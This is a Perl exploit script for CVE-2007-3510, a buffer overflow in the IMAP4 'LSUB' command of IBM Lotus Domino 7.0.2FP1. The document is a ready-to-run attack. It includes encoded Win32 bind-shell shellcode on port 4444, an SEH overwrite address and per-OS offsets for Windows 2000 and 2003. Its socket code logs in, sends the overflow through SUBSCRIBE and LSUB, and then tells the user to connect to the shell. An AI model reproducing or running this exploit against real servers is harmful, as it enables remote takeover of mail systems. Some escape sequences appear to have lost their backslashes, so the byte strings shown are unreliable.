CVE-2007-3510.pl.txt
Posted on 29 October 2007
#!perl # # "IBM Lotus Domino" IMAP4 Server 'LSUB' Command Exploit # # Author: Manuel Santamarina Suarez # e-Mail: FistFuXXer@gmx.de # use IO::Socket; use File::Basename; # # destination TCP port # $port = 143; # # SE handler # # You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters) # You must use a POP/POP/RET sequence that doesn't modify the ESP register or # the shellcode decoder will fail. # $seh = reverse( "x60x21x53x4E" ); # POP EDI/POP EBP/RET # nnotes.6021534e # universal on Lotus Domino 7.0.2FP1 # # Shellcode # You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters) # # 1. Step: Modified Win32 Bind Shellcode (EXITFUNC=thread, LPORT=4444) # 2. Step: Encoded with Alpha 2.0 (BASEADDRESS=ESP) # $sc = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIeyZiMSKYnPYI". "JNJy0tGTydqKOqcCDS2wDWLMnzmSxkYlkRYdLksMRFhWoOZNbRe5mxBWuVHvqcFS". "7vIORKmLzQmOToWf3RvqWhTOUViUD7Wfqvn3yLusEVmKMiuvBmuSkKNsrmzNpPhV". "bgOgpVIEsVRNpl2cOYnRDbl26fJePsR6cVkLKlUKO6TQWx6kLLpqRtGKVftSekP3". "OaKKlTgVV6KNyLqDoMtQB75KWvJJ0KoJGvzzSog9M5ftwiwisQkzMxiQXkyYDqqo". "ONy8uocPKNMxUX2crRPJWOKlsPavRLQWQbPLs8MNphKLZvXznenx5RamlOQumWQo". "btLSI2OJYJe5mQ0DyNyY7tctxNJiR4pDcBpJUaCOmLo6uaPDVdcKyRSOUyOpewzp". "ZzPeMQSMmMZkdBkXaMZRl3lzLcBSUPM8skzitBixQMibMbaNfkXSWp9xSkzjUSRc". "hX2EMWOt8eQmdn8QJTHMNHIQKhpemWRQYwkNvQSOXnL7yN9bXgiZfnGNQQUClp3M". "HIECH5WVPM59KMkYZolwliSeoQwyJzBMH5FQYlMlJEHhLiLdOkQu5rpS2RrltL70". "YO8KFfqVm7mKtFcvxXzkoXKwxe6WLNuB3sYYY8kqm73UlhEp0rQZKl1PbQDYOcPs". "RRRlfem8aMibLxKi0mij5TKXQKcUk76wlMLZA"; # # JUMP to 'ESP adjustment' and shellcode # $jmp = "x74x20". # JE SHORT "x75x20"; # JNZ SHORT # # # Don't edit anything after this line # # $sc_limit = 2300; sub usage { print "Usage: " . basename( $0 ) . " [target] [IPv4 address] [username] [password] ". "Example: ". basename( $0 ) . " 1 192.168.1.19 "Bill Gates/ServerName" "P4ssw0rd" ". " ". "Targets: ". "[1] Lotus Domino 7.0.2FP1 on Windows Server 2000 SP4 ". "[2] Lotus Domino 7.0.2FP1 on Windows Server 2003 SP2 "; exit; } # Net::IP::ip_is_ipv4 sub ip_is_ipv4 { my $ip = shift; unless ($ip =~ m/^[d.]+$/) { return 0; } if ($ip =~ m/^./) { return 0; } if ($ip =~ m/.$/) { return 0; } if ($ip =~ m/^(d+)$/ and $1 < 256) { return 1 } my $n = ($ip =~ tr/././); unless ($n >= 0 and $n < 4) { return 0; } if ($ip =~ m/../) { return 0; } foreach (split /./, $ip) { unless ($_ >= 0 and $_ < 256) { return 0; } } return 1; } print "-------------------------------------------------------- ". ' "IBM Lotus Domino" IMAP4 Server 'LSUB' Command Exploit'." ". "-------------------------------------------------------- "; if( ($#ARGV+1) != 4 ) { &usage; } $user = $ARGV[2]; $pass = $ARGV[3]; # Windows 2000 SP4 if( $ARGV[0] == 1 ) { $popad = "x41" x 3 . # INC ECX "x61" x 51; # POPAD } # Windows 2003 SP2 elsif( $ARGV[0] == 2 ) { $popad = "x41" x 2 . # INC ECX "x61" x 52; # POPAD } else { &usage; } if( ip_is_ipv4( $ARGV[1] ) ) { $ip = $ARGV[1]; } else { &usage; } if( length( $sc ) > $sc_limit ) { print "[-] Error: Shellcode's size exceeds $sc_limit bytes! "; exit; } print "[+] Connecting to $ip:$port... "; $sock = IO::Socket::INET->new ( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', Timeout => 2 ) or print "[-] Error: Couldn't establish a connection to $ip:$port! " and exit; print "[+] Connected. "; $mailbox = "x44" x 280 . $jmp . $seh . "x44" x 26 . $popad . $sc . "x44" x 3000; $sock->recv( $recv, 1024 ); $sock->send( "a001 LOGIN "$user" "$pass" " ); $sock->recv( $recv, 1024 ); if( $recv ne "a001 OK LOGIN completed " ) { print "[-] Error: Invalid username or password! "; exit; } print "[+] Successfully logged in. ". "[+] Trying to overwrite and control the SE handler... "; $sock->send( "a002 SUBSCRIBE {" . length( $mailbox ) . "} " ); $sock->recv( $recv, 1024 ); $sock->send( "$mailbox " ); $sock->recv( $recv, 1024 ); $sock->send( "a003 LSUB arg1 arg2 " ); sleep( 3 ); close( $sock ); print "[+] Done. Now check for a bind shell on $ip:4444! ";
